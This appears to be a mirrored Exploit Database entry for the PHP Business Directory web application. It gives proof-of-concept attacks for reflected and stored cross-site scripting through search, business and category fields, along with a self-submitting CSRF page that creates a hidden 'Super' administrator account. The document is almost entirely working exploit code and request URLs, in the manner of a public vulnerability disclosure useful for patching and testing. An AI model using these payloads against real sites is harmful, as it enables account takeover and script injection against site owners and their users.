PHP Business Directory – Multiple Vulnerabilities

• Exploit Database
• 89 阅读

• 作者： larrycompress
  日期： 2016-10-17
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/40559/

• # Exploit Title: PHP Business Directory - Multiple Vulnerabilities
  # Date: 2016-10-16
  # Exploit Author: larrycompress
  # Contact: larrycompress@gmail.com
  # Type: webapps
  # Platform: PHP
  # Vendor Homepage: http://www.pagereactions.com/product.php?pku=4
  # Software Link: http://www.pagereactions.com/downloads/phpbusinessdirectory.zip
  --------------------------------------------------------------------------------
  
  POC as follows :
  
  # 0x00 Reflected XSS
  
  ---
  
  1.In public search :
  
  http://192.168.1.112/phpbusinessdirectory/index.php?key=<svg/onload=alert(1)>&location=<svg/onload=alert(2)>
  
  2.In administration web interface (need normal user login) :
  
  http://192.168.1.112/phpbusinessdirectory/administration.php?key=<svg/onload=alert(1)>&location=<svg/onload=alert(2)>
  
  # 0x01 Stored XSS
  
  ---
  
  1.In administration web directory interface (need normal user login) :
  
  http://192.168.1.112/phpbusinessdirectory/administration.php
  ?pageaction=newsavebusiness
  &subaction=submit
  &businessname=<script>alert(1)</script>
  &slogan=<script>alert(2)</script>
  &businesslicence=<script>alert(3)</script>
  &address=<script>alert(4)</script>
  &city=<script>alert(5)</script>
  &suburb=<script>alert(6)</script>
  &businessstate=<script>alert(7)</script>
  &country=<script>alert(8)</script>
  &zippostcode=<script>alert(9)/*
  &telephone1=*/</script><script>alert(10)</script>
  &telephone2=<script>alert(11)</script>
  &mobilecell=<script>alert(12)</script>
  &fax=<script>alert(13)</script>
  &email=<script>alert(14)</script>
  &website=<script>alert(15)</script>
  &socialmedia1=<script>alert(16)</script>
  &socialmedia2=<script>alert(17)</script>
  &socialmedia3=<script>alert(18)</script>
  &productservice=<script>alert(19)</script>
  &manager=<script>alert(20)</script>
  &paymentsaccepted=<script>alert(21)</script>
  
  2.In administration web categories interface (needadministrator user login) :
  
  http://192.168.1.112/phpbusinessdirectory/administration.php?pageaction=savecategory&subaction=submit&categoryname=</select><svg/onload=alert(1)><select>
  
  # 0x02 CSRF (add Super user)
  
  ---
  
  In http://192.168.1.103/csrf.html :
  
  <!DOCTYPE html>
  <html>
  <body>
  <form action="http://192.168.1.112/phpbusinessdirectory/administration.php" method="POST">
  <input name="pageaction" value="saveuser" type="hidden" />
  <input name="subaction" value="submit" type="hidden" />
  <input name="username" value="larry_csrf" type="hidden" />
  <input name="password" value="larry_csrf" type="hidden" />
  <input name="userfullname" value="larry_csrf" type="hidden" />
  <input name="accesslevel" value="Super" type="hidden" />
  <input name="userstatus" value="active" type="hidden" />
  <input name="mysubmit" value="submit" type="submit" />
  </form>
  <script>
  document.forms[0].submit();
  </script>
  </body>
  </html>
  
  * Thanks to Besim *
  

  Python

  Copy